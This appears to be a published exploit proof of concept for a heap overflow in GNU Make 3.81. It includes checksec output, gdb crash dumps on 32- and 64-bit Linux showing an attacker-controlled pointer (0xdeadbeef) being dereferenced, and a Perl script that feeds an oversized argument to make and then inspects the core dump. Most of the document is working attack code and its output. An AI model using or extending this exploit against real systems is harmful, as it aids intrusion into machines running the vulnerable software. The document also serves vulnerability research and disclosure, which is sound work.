Make 3.81 - Heap Overflow PoC

=for comment

# Exploit Title: MAKE Heap Overflow - Pointer dereferencing POC (Calloc)-X86 X64

# Date: [14.07.14]

# Exploit Author: HyP

# Vendor Homepage: http://www.gnu.org/software/make/

# Software Link: http://ftp.gnu.org/gnu/make/

# Version: Make 3.81

# Tested on: linux32,64 bits (Fedora,Debian,ubuntu,Arch)

# CVE : none

*******************************************************************************************

Special Thanks:

kmkz

Zadyree

Sec0d Team

*******************************************************************************************

32bits

./checksec.sh --file make

RELRO STACK CANARY NX PIE RPATH

RUNPATH FILE

No RELRO No canary found NX enabled No PIE No RPATH

No RUNPATH make

gdb-peda$ r `perl -e 'print "A" x 4000 . "B"x96 . "\xef\xbe\xad\xde"x4'`

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]

...

EAX: 0xdeadbeef

EBX: 0x807b971 --> 0x6f2e ('.o')

ECX: 0x0

EDX: 0x1

ESI: 0xdeadbeef

EDI: 0x0

EBP: 0xbfffc5e8 --> 0xbfffc698 --> 0x8081de0 --> 0x0

ESP: 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')

EIP: 0x80548b2 (mov eax,DWORD PTR [eax])

EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction

overflow)

[-------------------------------------code-------------------------------------]

0x80548aa: je 0x80548b8

0x80548ac: lea esi,[esi+eiz*1+0x0]

0x80548b0: mov esi,eax

=> 0x80548b2: mov eax,DWORD PTR [eax] <------ Pointer Dereferencing

0x80548b4: test eax,eax

0x80548b6: jne 0x80548b0

0x80548b8: cmp DWORD PTR [ebp-0x1034],0x1

0x80548bf: mov DWORD PTR [ebp-0x10ac],edx

[------------------------------------stack-------------------------------------]

0000| 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')

0004| 0xbfffa314 --> 0x807b971 --> 0x6f2e ('.o')

0008| 0xbfffa318 --> 0x2

0012| 0xbfffa31c --> 0xb7ffadf8 ("symbol=%s; lookup in file=%s [%lu]\n")

0016| 0xbfffa320 --> 0x0

0020| 0xbfffa324 --> 0x0

0024| 0xbfffa328 --> 0x0

0028| 0xbfffa32c --> 0x0

[------------------------------------------------------------------------------]

Legend: code, data, rodata, value

Stopped reason: SIGSEGV

0x080548b2 in ?? ()

Overflow code:

...

80548aa: 74 0c je 80548b8 <calloc@plt+0xac38>

80548ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi

80548b0: 89 c6 mov %eax,%esi

80548b2: 8b 00 mov (%eax),%eax

80548b4: 85 c0 test %eax,%eax

80548b6: 75 f8 jne 80548b0 <calloc@plt+0xac30>

...

gdb-peda$ x/x $eax

0x807ff68: 0x00000000

peda vmmap

Start End Perm Name

0x08048000 0x0806f000 r-xp /root/Desktop/RESEARCH/make_BoF/make

0x0806f000 0x08070000 rw-p /root/Desktop/RESEARCH/make_BoF/make

0x08070000 0x08092000 rw-p [heap] // heap overflow !!

*******************************************************************************************

64bits

Overflow Code :

40cc59: 74 10 je 40cc6b <__ctype_b_loc@plt+0xa52b>

40cc5b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]

40cc60: 48 89 c3 mov rbx,rax

40cc63: 48 8b 00 mov rax,QWORD PTR [rax] // heap overflow

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]

RAX: 0xdeadbeefdeadbeef

RBX: 0xdeadbeefdeadbeef

RCX: 0x4242424242424242 ('BBBBBBBB')

RDX: 0x0

RSI: 0x7fffffff97d0 ('A' <repeats 200 times>...)

RDI: 0x7fffffffa7e2 --> 0x732e656c69666500 ('')

RBP: 0x7fffffffb930 --> 0x1

RSP: 0x7fffffff95f0 --> 0x0

RIP: 0x40cc63 (mov rax,QWORD PTR [rax])

R8 : 0x4242424242424242 ('BBBBBBBB')

R9 : 0x7ffff7972440 (mov dx,WORD PTR [rsi-0x2])

R10: 0x4242424242424242 ('BBBBBBBB')

R11: 0x7ffff799f990 --> 0xfffd28d0fffd2708

R12: 0x1

R13: 0x0

R14: 0x6397a0 --> 0x6f2e25 ('%.o')

R15: 0x0

EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction

overflow)

[-------------------------------------code-------------------------------------]

0x40cc59: je 0x40cc6b

0x40cc5b: nop DWORD PTR [rax+rax*1+0x0]

0x40cc60: mov rbx,rax

=> 0x40cc63: mov rax,QWORD PTR [rax] <----- Pointer dereferencing

0x40cc66: test rax,rax

0x40cc69: jne 0x40cc60

0x40cc6b: cmp DWORD PTR [rbp-0x105c],0x1

0x40cc72: lea rdi,[rbp-0x40]

[------------------------------------stack-------------------------------------]

0000| 0x7fffffff95f0 --> 0x0

0008| 0x7fffffff95f8 --> 0x0

0016| 0x7fffffff9600 --> 0x0

0024| 0x7fffffff9608 --> 0x645e50 --> 0x646630 --> 0x64667b -->

0x5f7266006362696c ('libc')

0032| 0x7fffffff9610 --> 0xffffffdf

0040| 0x7fffffff9618 --> 0x645e58 --> 0x6462f0 --> 0x64a500 --> 0x64a541

--> 0x5f726600656b616d ('make')

0048| 0x7fffffff9620 --> 0x7ffff7bd01f8 --> 0x645e50 --> 0x646630 -->

0x64667b --> 0x5f7266006362696c ('libc')

0056| 0x7fffffff9628 --> 0x0

[------------------------------------------------------------------------------]

Legend: code, data, rodata, value

Stopped reason: SIGSEGV

0x000000000040cc63 in ?? ()

*******************************************************************************************

Proof of Concept - Source code

*******************************************************************************************

=cut

#!/usr/bin/perl

use 5.010;

use strict;

use warnings;

say "Please set ulimit value to 1000 before (ulimit -c 1000) ";

sleep 0.5;

my $buff = "A"x 4096 ;

my $addr = "\xef\xbe\xad\xde";

my $make = "./make";

my $gdb = "gdb --core core";

my $PAYLOAD= (`perl -e 'print "$buff" . "$addr" '`);

my $exec= qx($make $PAYLOAD);

say " Reading Core file GDB ";

sleep 0.5;

system ($gdb);